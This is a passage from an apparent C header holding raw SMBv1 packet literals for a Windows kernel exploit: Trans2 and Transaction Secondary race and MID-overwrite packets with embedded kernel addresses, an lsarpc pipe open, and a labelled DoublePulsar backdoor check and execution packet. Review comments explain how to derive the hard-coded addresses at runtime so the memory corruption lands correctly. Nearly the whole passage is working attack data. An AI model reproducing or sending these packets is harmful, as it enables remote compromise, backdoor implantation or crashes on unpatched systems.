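"\xab\xa1\x14\x69\xe9\xda\x61\x27\xf9\xff\x47\x77\x14\x71\x06\xe2" \
"\x33\x00\x80\x4e\x72\x63\xe8\x9c\x62\xe6\xdd\xdb\x72\xca\x6d\xf8" \
"\x1f\x62\xd7\x14\xfe\x7b\x74\x57\x6a\x11\xc0\x89\xd9\xd5\xd9\x30" \
"\x9e\x9d\x61\x87\x2b\x2f\x2e\x0a\x88\x81\xb2\xe6\x22\xee\x7d\x15" \
"\x98\x68\xbf\x6d\xb6\x33\x3e\x63\x39\x2d\x9d\xdd\x92\x2d\x5e\xc1" \
"\x46\x7e\x8b\x9e\x16\x08\x6e\x30\x9c\x1c\x31\x01\x7c\x81\xf0\xfc" \
"\xd5\xbb\xf9\x2d\x20\x17\xc6\x7b\x17\x87\x8b\xa9\xe0\xd7\xba\x5e" \
"\x0b\x3e\x71\x81\xa5\xd4\x31\xb0\xf2\xfa\xcd\x14\x07\x34\xf2\x6c" \
"\xdd\x89\x38\x79\x12\xe0\x19\xb7\xfc\x75\xc1\x89\x2b\xd9\x1e\xb9" \
"\x18\xa0\x09\x89\x13\x24\x08\x17\x26\x88\x7e\x72\x0f\x61\xb6\x09" \
"\xfc\x28\xb9\xdb\x2c\xf4\x4b\x17\x27\x78\xfe\x82\xa4\xe0\xc1\x6d" \
"\xde\x8d\xd5\x73\x62\x2f\x8e\xda\x1a\x5b\xc8\xd2\xa8\x08\x77\x63" \
"\xc8\x18\x41\x47\xd4\x5e\x7c\x83\x20\x39\x88\x02\x45\x42\xe2\xfb" \
"\x18\x18\xdc\x67\x5f\xd4\x62\x53\xfc\x2f\xb4\x56\xb1\xd4\x79\xf0" \
"\x20\xfe\x1b\x17\x3a\xd1\xcf\xcb\xb7\x89\x2c\xdd\xce\xfc\xc8\xcd" \
"\xc7\x7c\xaf\xf4\x9b\x9c\x2f\xc8\x3f\xe8\xd6\x88\xcc\x16\x07\x0d" \
"\x29\xa9\x1d\x0f\x53\xa8\x72\xa7\x04\x60\x42\x51\xc8\xb5\xc2\x36"

#define WRITE_ANDX_INDATA_SHIFT_PACKET_SIZE 576
static_assert(sizeof(WRITE_ANDX_INDATA_SHIFT_PACKET) - 1 == WRITE_ANDX_INDATA_SHIFT_PACKET_SIZE,
              "WRITE_ANDX_INDATA_SHIFT_PACKET_SIZE does not match the literal");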
240 |
241 |
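/*
 * SMB_COM_TRANSACTION_SECONDARY (0x26), PID 0x280b, MID 0x4000:
 * DataCount 2 at DataOffset 0x42 with DataDisplacement 0x5330, ByteCount 17.
 * 72 bytes = NetBIOS length 0x44 + 4.
 */
#define TRANS_SECONDARY_MID_OVERWRITE_PACKET "\x00\x00\x00\x44\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28" \
"\x00\x08\x00\x40\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02" \
"\x00\x42\x00\x30\x53\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00"

#define TRANS_SECONDARY_MID_OVERWRITE_PACKET_SIZE 72
static_assert(sizeof(TRANS_SECONDARY_MID_OVERWRITE_PACKET) - 1 == TRANS_SECONDARY_MID_OVERWRITE_PACKET_SIZE,
              "TRANS_SECONDARY_MID_OVERWRITE_PACKET_SIZE does not match the literal");


/*
 * SMB_COM_TRANSACTION_SECONDARY (0x26), PID 0x280c, MID 0x0000:
 * DataCount 1 at DataOffset 0x42 with DataDisplacement 0xffff, ByteCount 16.
 * 71 bytes = NetBIOS length 0x43 + 4.
 */
#define TRANS_SECONDARY_FIRST_MID_ZERO_PACKET "\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" \
"\x00\x42\x00\xff\xff\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00"

#define TRANS_SECONDARY_FIRST_MID_ZERO_PACKET_SIZE 71
static_assert(sizeof(TRANS_SECONDARY_FIRST_MID_ZERO_PACKET) - 1 == TRANS_SECONDARY_FIRST_MID_ZERO_PACKET_SIZE,
              "TRANS_SECONDARY_FIRST_MID_ZERO_PACKET_SIZE does not match the literal");

/*
 * SMB_COM_TRANSACTION_SECONDARY (0x26), PID 0x280b, MID 0x4000:
 * DataCount 8 at DataOffset 0x42 with DataDisplacement 0x52f0, ByteCount 23.
 * The 8 data bytes at the end (\xa4\xe8\x32\x33\x80\xfa\xff\xff) read as the
 * little-endian 64-bit value 0xfffffa803332e8a4.
 * NOTE(review): that looks like an absolute kernel address captured from one
 * particular target; if so it has to be derived from the leak at runtime, not
 * replayed, or the write lands on the wrong object and crashes the target.
 * 78 bytes = NetBIOS length 0x4a + 4.
 */
#define TRANS_SECONDARY_FIRST_SPECIAL_MID_PACKET "\x00\x00\x00\x4a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28" \
"\x00\x08\x00\x40\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08" \
"\x00\x42\x00\xf0\x52\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\xa4\xe8\x32\x33\x80\xfa\xff\xff"

#define TRANS_SECONDARY_FIRST_SPECIAL_MID_PACKET_SIZE 78
static_assert(sizeof(TRANS_SECONDARY_FIRST_SPECIAL_MID_PACKET) - 1 == TRANS_SECONDARY_FIRST_SPECIAL_MID_PACKET_SIZE,
              "TRANS_SECONDARY_FIRST_SPECIAL_MID_PACKET_SIZE does not match the literal");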
266 |
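/*
 * Nine SMB_COM_TRANSACTION_SECONDARY (0x26) messages concatenated into one
 * send (NetBIOS lengths 0x46,0x46,0x4a,0x6a,0x4a,0x43,0x46,0x43,0x42 ->
 * 74+74+78+110+78+71+74+71+70 = 700 bytes).  MIDs alternate between 0x0000
 * and 0x4000 (the latter with PID 0x280b); the last message carries MID 0x5c.
 * Several messages embed 8-byte little-endian values in the 0xfffff8a0.. /
 * 0xfffffa80.. range (e.g. \x80\xf5\x62\x06\xa0\xf8\xff\xff).
 * NOTE(review): those look like absolute kernel addresses from one specific
 * target; if so they must be recomputed from the leak at runtime rather than
 * replayed verbatim, or the corruption lands on the wrong object.
 */
#define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_ONE_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
"\x00\x42\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x46\xff\x53" \
"\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x08\x0b\x28\x00\x08\x00\x40\x08\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x42\x00\x18\x53\x13" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x10\x00\x00\x00\x00\x00\x4a\xff\x53\x4d\x42\x26\x00\x00\x00" \
"\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x08\x0b\x28\x00\x08\x00\x40\x08\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x08\x00\x42\x00\xf0\x52\x17\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xf5\x62\x06\xa0\xf8" \
"\xff\xff\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18" \
"\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08" \
"\x0c\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x28\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x60\xe5\x07\x35\x80\xfa\xff\xff" \
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" \
"\x00\x00\x00\x4a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08" \
"\x00\x42\x00\x60\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\xd4\xf5\x62\x06\xa0\xf8\xff\xff\x00\x00" \
"\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08" \
"\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42" \
"\x00\xb5\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x01\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00" \
"\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x04\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00" \
"\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00" \
"\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" \
"\x42\x00\xe1\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x42\xff\x53\x4d\x42\x26\x00" \
"\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

#define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_ONE_PACKET_SIZE 700
static_assert(sizeof(TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_ONE_PACKET) - 1 == TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_ONE_PACKET_SIZE,
              "TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_ONE_PACKET_SIZE does not match the literal");

/*
 * SMB_COM_TRANSACTION_SECONDARY (0x26), PID 0x280c, MID 0x0000: DataCount 0x28
 * at DataOffset 0x42 with DataDisplacement 0x88, ByteCount 0x37.  The data
 * starts with \x50\xd2\x68\x06\x80\xf8\xff\xff (LE 0xfffff8800668d250); the
 * THIRD/FOURTH variants below differ from this one only in that value
 * (..d4.., ..d6..), so see the address caveat above.
 * 110 bytes = NetBIOS length 0x6a + 4.
 */
#define TRANS_SECONDARY_SECOND_MID_ZERO_PACKET "\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28" \
"\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x50\xd2\x68\x06\x80\xf8\xff\xff\x04\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"

#define TRANS_SECONDARY_SECOND_MID_ZERO_PACKET_SIZE 110
static_assert(sizeof(TRANS_SECONDARY_SECOND_MID_ZERO_PACKET) - 1 == TRANS_SECONDARY_SECOND_MID_ZERO_PACKET_SIZE,
              "TRANS_SECONDARY_SECOND_MID_ZERO_PACKET_SIZE does not match the literal");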
323 |
324 |
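/*
 * Four SMB_COM_TRANSACTION_SECONDARY (0x26) messages in one send (NetBIOS
 * lengths 0x46,0x43,0x43,0x42 -> 74+71+71+70 = 286 bytes).  All use PID 0x280c;
 * the first three have MID 0x0000, the last MID 0x5c.  Unlike the TYPE_ONE
 * packet this one embeds no address-looking 8-byte values.
 */
#define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
"\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00\x00\x00\x43\xff\x53" \
"\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42\x00\xe3\x00\x10" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07" \
"\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c" \
"\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x01\x00\x42\x00\x01\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x42\xff\x53\x4d\x42" \
"\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"


#define TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE 286
static_assert(sizeof(TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET) - 1 == TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE,
              "TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE does not match the literal");

/*
 * Same as TRANS_SECONDARY_SECOND_MID_ZERO_PACKET except for the embedded
 * 8-byte value, here \x50\xd4\x68\x06\x80\xf8\xff\xff (LE 0xfffff8800668d450).
 * NOTE(review): looks like a target-specific kernel address; derive at runtime.
 * 110 bytes = NetBIOS length 0x6a + 4.
 */
#define TRANS_SECONDARY_THIRD_MID_ZERO_PACKET "\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28" \
"\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x50\xd4\x68\x06\x80\xf8\xff\xff\x04\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"

#define TRANS_SECONDARY_THIRD_MID_ZERO_PACKET_SIZE 110
static_assert(sizeof(TRANS_SECONDARY_THIRD_MID_ZERO_PACKET) - 1 == TRANS_SECONDARY_THIRD_MID_ZERO_PACKET_SIZE,
              "TRANS_SECONDARY_THIRD_MID_ZERO_PACKET_SIZE does not match the literal");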
356 |
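/*
 * Byte-for-byte the same literal as TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET
 * (four TRANSACTION_SECONDARY messages, 286 bytes) at the time of review; kept
 * as a separate definition so that callers keep their own name.  If the two
 * are ever meant to diverge, document the difference here.
 */
#define TRANS_SECONDARY_SECOND_MULTI_SMB_RACE_TYPE_TWO_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
"\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00\x00\x00\x43\xff\x53" \
"\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42\x00\xe3\x00\x10" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07" \
"\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c" \
"\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x01\x00\x42\x00\x01\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x42\xff\x53\x4d\x42" \
"\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

#define TRANS_SECONDARY_SECOND_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE 286
static_assert(sizeof(TRANS_SECONDARY_SECOND_MULTI_SMB_RACE_TYPE_TWO_PACKET) - 1 == TRANS_SECONDARY_SECOND_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE,
              "TRANS_SECONDARY_SECOND_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE does not match the literal");


/*
 * Same as TRANS_SECONDARY_SECOND_MID_ZERO_PACKET except for the embedded
 * 8-byte value, here \x50\xd6\x68\x06\x80\xf8\xff\xff (LE 0xfffff8800668d650).
 * NOTE(review): looks like a target-specific kernel address; derive at runtime.
 * 110 bytes = NetBIOS length 0x6a + 4.
 */
#define TRANS_SECONDARY_FOURTH_MID_ZERO_PACKET "\x00\x00\x00\x6a\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28" \
"\x00\x42\x00\x88\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x50\xd6\x68\x06\x80\xf8\xff\xff\x04\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00"

#define TRANS_SECONDARY_FOURTH_MID_ZERO_PACKET_SIZE 110
static_assert(sizeof(TRANS_SECONDARY_FOURTH_MID_ZERO_PACKET) - 1 == TRANS_SECONDARY_FOURTH_MID_ZERO_PACKET_SIZE,
              "TRANS_SECONDARY_FOURTH_MID_ZERO_PACKET_SIZE does not match the literal");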
388 |
389 |
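/*
 * Byte-for-byte the same literal as TRANS_SECONDARY_MULTI_SMB_RACE_TYPE_TWO_PACKET
 * (four TRANSACTION_SECONDARY messages, 286 bytes) at the time of review; kept
 * as a separate definition so that callers keep their own name.
 */
#define TRANS_SECONDARY_THIRD_MULTI_SMB_RACE_TYPE_TWO_PACKET "\x00\x00\x00\x46\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" \
"\x00\x42\x00\x54\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x23\x00\x00\x40\x00\x00\x00\x43\xff\x53" \
"\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x00\x00\x08\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x42\x00\xe3\x00\x10" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x43\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07" \
"\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c" \
"\x28\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x01\x00\x42\x00\x01\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x42\xff\x53\x4d\x42" \
"\x26\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x08\x0c\x28\x00\x08\x5c\x00\x08\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

#define TRANS_SECONDARY_THIRD_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE 286
static_assert(sizeof(TRANS_SECONDARY_THIRD_MULTI_SMB_RACE_TYPE_TWO_PACKET) - 1 == TRANS_SECONDARY_THIRD_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE,
              "TRANS_SECONDARY_THIRD_MULTI_SMB_RACE_TYPE_TWO_PACKET_SIZE does not match the literal");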
410 |
411 |
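/*
 * SMB_COM_NT_CREATE_ANDX (0xa2), PID 0x280c, MID 0x0080, WordCount 0x18.
 * NameLength 0x0c and the trailing name bytes are "lsarpc" in UTF-16LE
 * (\x6c\x00\x73\x00\x61\x00\x72\x00\x70\x00\x63\x00) plus a 2-byte terminator,
 * i.e. it opens the lsarpc named pipe on the hard-coded TID 0x0800.
 * 102 bytes = NetBIOS length 0x62 + 4.
 */
#define SECOND_NT_CREATE_ANDX_PACKET "\x00\x00\x00\x62\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x80\x00\x18\xff\x00\x62\x00\x00\x0c\x00\x16\x00\x00\x00" \
"\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" \
"\x02\x00\x00\x00\x03\x0f\x00\x00\x6c\x00\x73\x00\x61\x00\x72\x00" \
"\x70\x00\x63\x00\x00\x00"

#define SECOND_NT_CREATE_ANDX_PACKET_SIZE 102
static_assert(sizeof(SECOND_NT_CREATE_ANDX_PACKET) - 1 == SECOND_NT_CREATE_ANDX_PACKET_SIZE,
              "SECOND_NT_CREATE_ANDX_PACKET_SIZE does not match the literal");

/*
 * SMB_COM_TRANSACTION_SECONDARY (0x26), PID 0x280c, MID 0x0000: DataCount 0x20
 * at DataOffset 0x42 with DataDisplacement 0x90, ByteCount 0x2f.  Carries no
 * address-looking values, only small constants.
 * 102 bytes = NetBIOS length 0x62 + 4.
 */
#define TRANS_SECONDARY_FIFTH_MID_ZERO_PACKET "\x00\x00\x00\x62\xff\x53\x4d\x42\x26\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x0c\x28" \
"\x00\x08\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20" \
"\x00\x42\x00\x90\x00\x2f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x01\x00\x00"

#define TRANS_SECONDARY_FIFTH_MID_ZERO_PACKET_SIZE 102
static_assert(sizeof(TRANS_SECONDARY_FIFTH_MID_ZERO_PACKET) - 1 == TRANS_SECONDARY_FIFTH_MID_ZERO_PACKET_SIZE,
              "TRANS_SECONDARY_FIFTH_MID_ZERO_PACKET_SIZE does not match the literal");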
431 |
432 |
433 |
434 |
435 |
436 | /*
437 | *
438 | *
439 | * DoublePulsar Packet Strings
440 | *
441 | *
442 | */
443 |
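/*
 * SMB_COM_TRANSACTION2 (0x32) with Setup[0] = 0x000e (SESSION_SETUP),
 * TID/UID 0x0800, PID 0xfeff, MID 0x0041.  TotalParameterCount 12,
 * TotalDataCount 0, SetupCount 1, ByteCount 13 (= 0 data + 13, matching the
 * REQ_TRANSACTION2_SESSION_SETUP comment in smbtransaction.h); the 12
 * parameter bytes are all zero.  82 bytes = NetBIOS length 0x4e + 4, so this
 * literal is the complete message.
 */
#define DOUBLE_PULSAR_CHECK_TRANS2_SESSION_SETUP_PACKET "\x00\x00\x00\x4e\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
"\x00\x08\x41\x00\x0f\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00" \
"\x00\x77\xbf\xed\x00\x00\x00\x0c\x00\x42\x00\x00\x00\x4e\x00\x01" \
"\x00\x0e\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00"

#define DOUBLE_PULSAR_CHECK_TRANS2_SESSION_SETUP_PACKET_SIZE 82
static_assert(sizeof(DOUBLE_PULSAR_CHECK_TRANS2_SESSION_SETUP_PACKET) - 1 == DOUBLE_PULSAR_CHECK_TRANS2_SESSION_SETUP_PACKET_SIZE,
              "DOUBLE_PULSAR_CHECK_TRANS2_SESSION_SETUP_PACKET_SIZE does not match the literal");

/*
 * SMB_COM_TRANSACTION2 (0x32) SESSION_SETUP, PID 0xfeff, MID 0x0042, with
 * non-zero parameter bytes.  The literal is only the FIRST 82 bytes of the
 * message: the NetBIOS length is 0x104e (4174) and TotalDataCount/DataCount
 * are 0x1000 (4096) at DataOffset 0x4e (stream offset 82), ByteCount 0x100d
 * (= 4096 + 13).  The caller therefore has to send exactly 4096 bytes of
 * Trans2 data immediately after this literal; sending these 82 bytes alone
 * leaves the server blocked waiting for the remainder of the NetBIOS frame.
 */
#define DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET \
"\x00\x00\x10\x4e\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
"\x00\x08\x42\x00\x0f\x0c\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00" \
"\x00\x66\xb8\xaa\x00\x00\x00\x0c\x00\x42\x00\x00\x10\x4e\x00\x01" \
"\x00\x0e\x00\x0d\x10\x00\xce\x75\x60\x63\xce\x27\x60\x63\xce\x37" \
"\x60\x63"

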